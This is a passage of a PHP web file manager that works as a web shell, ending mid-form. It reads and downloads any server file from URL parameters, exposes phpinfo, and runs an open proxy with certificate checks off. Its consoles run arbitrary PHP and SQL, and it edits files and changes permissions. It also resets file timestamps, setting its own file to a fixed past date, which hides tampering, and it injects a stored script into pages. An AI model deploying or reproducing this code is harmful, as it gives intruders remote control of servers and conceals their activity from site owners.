			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl.'_templates'} = $fm_php;
					$msg_ntimes .= __('File updated');
				} else $msg_ntimes .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime);
			}	
		} else $msg_ntimes .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
		switch  ($info[2]){	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1: $ext='gif'; break;
			case 2: $ext='jpeg'; break;
			case 3: $ext='png'; break;
			case 6: $ext='bmp'; break;
			default: die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file=base64_decode($_GET['download']);
	fm_download($file);	
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo(); 
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url'])?urldecode($_GET['url']):'';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result);
		echo $result;
		die();
	} 
}
?>
<!doctype html>
<html>
<head>     
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>"hello"</title>
<style>
body {
	background-color:	white;
	font-family:		Verdana, Arial, Helvetica, sans-serif;
	font-size:			8pt;
	margin:				0px;
}

a:link, a:active, a:visited { color: #006699; text-decoration: none; }
a:hover { color: #DD6900; text-decoration: underline; }
a.th:link { color: #FFA34F; text-decoration: none; }
a.th:active { color: #FFA34F; text-decoration: none; }
a.th:visited { color: #FFA34F; text-decoration: none; }
a.th:hover {  color: #FFA34F; text-decoration: underline; }

table.bg {
	background-color: #ACBBC6
}

th, td { 
	font:	normal 8pt Verdana, Arial, Helvetica, sans-serif;
	padding: 3px;
}

th	{
	height:				25px;
	background-color:	#006699;
	color:				#FFA34F;
	font-weight:		bold;
	font-size:			11px;
}

.row1 {
	background-color:	#EFEFEF;
}

.row2 {
	background-color:	#DEE3E7;
}

.row3 {
	background-color:	#D1D7DC;
	padding: 5px;
}

tr.row1:hover {
	background-color:	#F3FCFC;
}

tr.row2:hover {
	background-color:	#F0F6F6;
}

.whole {
	width: 100%;
}

.all tbody td:first-child{width:100%;}

textarea {
	font: 9pt 'Courier New', courier;
	line-height: 125%;
	padding: 5px;
}

.textarea_input {
	height: 1em;
}

.textarea_input:focus {
	height: auto;
}

input[type=submit]{
	background: #FCFCFC none !important;
	cursor: pointer;
}

.folder {
    background-image: url("data:image/png;base64,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");
}

.file {
    background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvKeIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qbcZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4PziIuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSFoyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMTg5XEETAAAB8klEQVQ4y3WSMW/TQBiGn++7sx3XddMAIm0nkCohRQiJDSExdAl/ATEwIPEzkFiYYGRlyMyGxMLExFhByy9ACAaa0gYnDol9x9DYiVs46dPnk/w+9973ngDJ/v7++yAICj+fI0HA/5ZzDu89zjmOjo6yfr//wAJBr9e7G4YhxWSCRFH902qVZdnYx3F8DIQWIMsy1pIEXxSoMfVJ50FeDKUrcGcwAVCANE1ptVqoKqqKMab+rvZhvMbn1y/wg6dItIaIAGABTk5OSJIE9R4AEUFVcc7VPf92wPbtlHz3CRt+jqpSO2i328RxXNtehYgIprXO+ONzrl3+gtEAEW0ChsMhWZY17l5DjOX00xuu7oz5ET3kUmejBteATqdDHMewEK9CPDA/fMVs6xab23tnIv2Hg/F43Jy494gNGH54SffGBqfrj0laS3HDQZqmhGGIW8RWxffn+Dv251t+te/R3enhEUSWVQNGoxF5nuNXxKKGrwfvCHbv4K88wmiJ6nKwjRijKMIYQzmfI4voRIQi3uZ39z5bm50zaHXq4v41YDqdgghSlohzAMymOddv7mGMUJZlI9ZqwE0Hqoi1F15hJVrtCxe+AkgYhgTWIsZgoggRwVp7YWCryxijFWAyGAyeIVKocyLW1o+o6ucL8Hmez4DxX+8dALG7MeVUAAAAAElFTkSuQmCC");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>

</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated');
		else $msg_ntimes .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg_ntimes .= (__('File updated')); 
		else $msg_ntimes .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
